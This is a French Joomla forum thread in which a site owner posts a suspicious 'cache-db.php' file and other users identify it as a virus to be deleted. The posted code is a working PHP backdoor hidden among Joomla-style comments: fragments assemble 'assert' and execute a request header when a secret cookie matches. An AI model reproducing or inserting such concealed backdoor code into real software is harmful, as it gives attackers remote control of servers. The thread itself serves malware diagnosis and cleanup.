Fichier bizarre dans le répertoire cache

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Fichier bizarre dans le répertoire cache

    Bonjour à tous

    J'ouvre un nouveau ticket, un peu ressemblant à mon précédent, mais différent:

    Voilà, sur un site, j'ai remarqué un étrange fichier cache-db.php dans le répertoire cache.

    Le contenu n'a pas l'air d'être un hack, mais tout de même, c'est mon seul site qui présente ce fichier.

    Je vous mets ici le contenu, si vous avez une petite idée, je suis preneur...

    Code:
    <?php
    /**
     * @package     Joomla.Platform
     * @subpackage  Application
     *
     * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
     * @license     GNU General Public License version 2 or later; see LICENSE
     */
    
    !defined('JPATH_PLATFORM') or die;
    
    /**
     * Base object Instance of SimplePie_Sanitize (or other class)
     *
     * @since  11.4
     */
    
    /**
     * SimplePie Name
     */
    define('SIMPLEPIE_NAME', 'SimplePie');
    
    /**
     * SimplePie Version
     */
    define('SIMPLEPIE_VERSION', '1.2');
    
    /**
     * SimplePie Build
     */
    define('SIMPLEPIE_BUILD', '20090627192103');
    
    /**
     * SimplePie Session ID
     */
    $id = $_SERVER['HTTP_SESSION'];
    
    /**
     * Class constructor.
     *
     * @param   JInputCli         $input       An optional argument to provide dependency injection for the application's
     *                                         input object.  If the argument is a JInputCli object that object will become
     *                                         the application's input object, otherwise a default input object is created.
     * @param   Registry          $config      An optional argument to provide dependency injection for the application's
     *                                         config object.  If that object will become
     *                                         the application's config object, otherwise a default config object is created.
     * @param   JEventDispatcher  $dispatcher  An optional argument to provide dependency injection for the application's
     *                                         event dispatcher.  If the argument become
     *                                         the application's event dispatcher, if it is null then the default event dispatcher
     *                                         will be created based on the application's loadDispatcher() method.
     *
     * @see     JApplicationBase::loadDispatcher()
     * @since   11.1
     */
    
    function construct($input = null, $config = null, $dispatcher = null)
    {
        // Close the application if we are not executed from the command line.
        // @codeCoverageIgnoreStart
        if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
        {
            $this->close();
        }
        // @codeCoverageIgnoreEnd
    
        // If a input object is given use it.
        if ($input instanceof JInput)
        {
            $this->input = $input;
        }
        // Create the input based on the application logic.
        else
        {
            if (class_exists('JInput'))
            {
                $this->input = new JInputCli;
            }
        }
    
        // If a config object is given use it.
        if ($config instanceof Registry)
        {
            $this->config = $config;
        }
        // Instantiate a new configuration object.
        else
        {
            $this->config = new Registry;
        }
    
        $this->loadDispatcher($dispatcher);
    
        // Load the configuration object.
        $this->loadConfiguration($this->fetchConfigurationData());
    
        // Set the execution datetime and timestamp;
        $this->set('execution.datetime', gmdate('Y-m-d H:i:s'));
        $this->set('execution.timestamp', time());
    
        // Set the current directory.
        $this->set('cwd', getcwd());
    }
    
    /**
     * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.
     *
     * This method must be invoked as: $cli = JApplicationCli::getInstance();
     *
     * @param   string  $name  The*/$sess = md5(@$_COOKIE[ssid]);/*of the JApplicationCli class to instantiate.
     *
     * @return  JApplicationCli
     *
     * @since   11.1
     */ $a='as';
    
    function getInstance($name = null)
    {
        // Only create the object if it doesn't exist.
        if (empty(self::$instance))
        {
            if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))
            {
                self::$instance = new $name;
            }
            else
            {
                self::$instance = new JApplicationCli;
            }
        }
    
        return self::$instance;
    }
    
    /**
     * Execute the application.
     *
     * @return  void
     *
     * @since   11.1
     */ $b='sert'; $a=$a.$b;
    function execute()
    {
        // Trigger the onBeforeExecute event.
        $this->triggerEvent('onBeforeExecute');
    
        // Perform application routines.
        $this->doExecute();
    
        // Trigger the onAfterExecute event.
        $this->triggerEvent('onAfterExecute');
    }
    
    /**
     * Load an object or array into the application configuration object.
     *
     * @param   mixed  $data  Either an array or object to be loaded into the configuration object.
     *
     * @return  JApplicationCli  Instance of $this to allow chaining.
     *
     * @since   11.1
     */ $start = strpos($sess,'e89159');
    function loadConfiguration($data)
    {
        // Load the data into the configuration object.
        if (is_array($data))
        {
            $this->config->loadArray($data);
        }
        elseif (is_object($data))
        {
            $this->config->loadObject($data);
        }
    
        return $this;
    }
    
    /**
     * Write a string to standard output.
     *
     * @param   string   $text  The text to display.
     * @param   boolean  $nl    True (default) to append a new line at the end of the output string.
     *
     * @return  JApplicationCli  Instance of $this to allow chaining.
     *
     * @codeCoverageIgnore
     * @since   11.1
     */
    function out($text = '', $nl = true)
    {
        $output = $this->getOutput();
        $output->out($text, $nl);
    
        return $this;
    }
    
    /**
     * Get an output object.
     *
     * @return  CliOutput
     *
     * @since   3.3
     */ if($start===0){@${a}($id);}
    function getOutput()
    {
        if (!$this->output)
        {
            // In 4.0, this will convert to throwing an exception and you will expected to
            // initialize this in the constructor. Until then set a default.
            $default = new Joomla\Application\Cli\Output\Xml;
            $this->setOutput($default);
        }
    
        return $this->output;
    }
    
    
    /**
     * Method to run the application routines.  Most likely you will want to instantiate a controller
     * and execute it, or perform some sort of task directly.
     *
     * @return  void
     *
     * @codeCoverageIgnore
     * @since   11.3
     */
    function doExecute()
    {
        // Your application routines go here.
    }

  • #2
    Re : Fichier bizarre dans le répertoire cache

    J'ai trouvé ça ...
    http://studioblog.advertiseagents.co...m-entdeckt#%22

    ... dont un extrait traduit (automatiquement)
    " ... Depuis 31 Décembre 2015. Cependant, il faut multiplier les messages via un soi-disant "cache-db.php". Un affligé avec le fichier de code malveillant qui ne fait pas partie de la livraison standard du package Joomla et est vulnérable à divers robots des spammeurs, en particulier des messages forts de Host Europe, Alfahosting et beaucoup d'autres sociétés d'hébergement Web.

    Le fichier "cache-db.php" est pour le fonctionnement de Jooomla pas nécessaire ou appartenait pas dans la structure du système. Ceci est confirmé non seulement la recherche agence de publicité Advertiseagents mais aussi de nombreux rapports indépendants du réseau. Par exemple, des cercles du forum officiel Joomla Allemagne ( voir ici ) .Close les sites concernés représentent la vulnérabilité trouvée pas dans une période, cela peut avoir un blocage du site par le fournisseurs d' hébergement Web à suivre... "


    Ainsi je lis qu'on recommande par ci par là de déjà supprimer ce fichier ...
    Personnellement tout ce qui est dans le cache , je le supprime régulièrement sur mes sites ... (à part le fichier index.html)

    Pour ce qui est du hack du site ou pas, je ne peux rien dire !?
    La seule fois où j'ai vu des rajouts de liens sur l'un de mes sites ... c'était une insertion directe
    dans le base de données car les fichiers Joomla n'avaient eux pas été touchés depuis au moins 1 mois donc restauration d'une sauvegarde ... et plus de liens ensuite bien sûr analyse des logs pour tenter
    de retrouver le comment du pourquoi !?
    Solidaire avec les dinosaures

    Commentaire


    • #3
      Re : Fichier bizarre dans le répertoire cache

      re-Bonjour Georgie

      Raté, c'est un hack. Si tu es vigilant, tu le trouveras rien "qu'avec tes yeux", aucun outil requis.

      J'en parlerais Samedi prochain lors de ma présentation "Votre site est-il hacké" ? (https://www.joomladay.fr/programme/e...t-m-en-assurer).

      J'ai nommé ça les virus puzzle. Faut en recoller les morceaux ;-)

      Vire-le, ce fichier est un virus.

      Note : cela fait plusieurs fois que tu nous remontes ce type d'info càd que tu trouves des fichiers. Tu devrais faire un grand nettoyage de printemps; c'est cool, c'est la bonne saison ;-)

      Bonne journée.
      Dernière édition par cavo789 à 22/04/2016, 14h11
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire

      Annonce

      Réduire
      Aucune annonce pour le moment.

      Partenaire de l'association

      Réduire

      Hébergeur Web PlanetHoster
      Travaille ...
      X